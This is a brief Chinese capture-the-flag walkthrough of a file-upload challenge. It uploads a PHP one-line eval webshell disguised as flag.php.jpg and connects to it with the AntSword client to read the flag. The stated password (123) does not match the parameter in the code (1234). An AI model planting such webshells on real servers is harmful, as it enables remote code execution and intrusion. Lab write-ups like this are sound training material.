题目
1.打开靶机
随便上传一个图片,查看get请求发现**/upload/XXX.jpg**
2.创建一个脚本文件
命名为flag.php.jpg,并上传
脚本文件内容:
<?php @eval($_POST[1234])?>
3上传后复制文件get请求的链接并打开蚁剑
连接密码为123
双击链接
4,查找'/'在最下面找到flag文件
5,打开文件得到flag
相关推荐
世界尽头与你11 小时前
CVE-2022-46463 Harbor public 镜像仓库信息泄露XH-hui16 小时前
【打靶日记】群内靶机vm12501_9421196820 小时前
HTTPS:企业网站SEO优化的基石与信任凭证世界尽头与你1 天前
CVE-2016-2183_ OpenSSL 信息泄露漏洞火白学安全2 天前
《Python红队攻防零基础脚本编写:进阶篇(一)》Whoami!2 天前
⸢ 拾陆-Ⅵ⸥⤳ 安全数智化建设:安全管控平台lingggggaaaa2 天前
免杀对抗——C2远控篇&C&C++&DLL注入&过内存核晶&镂空新增&白加黑链&签名程序劫持jenchoi4133 天前
【2025-11-23】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总AI绘画小333 天前
网络安全(黑客技术)—2025自学手册XH-hui3 天前
【打靶日记】HackMyVm 之 hunter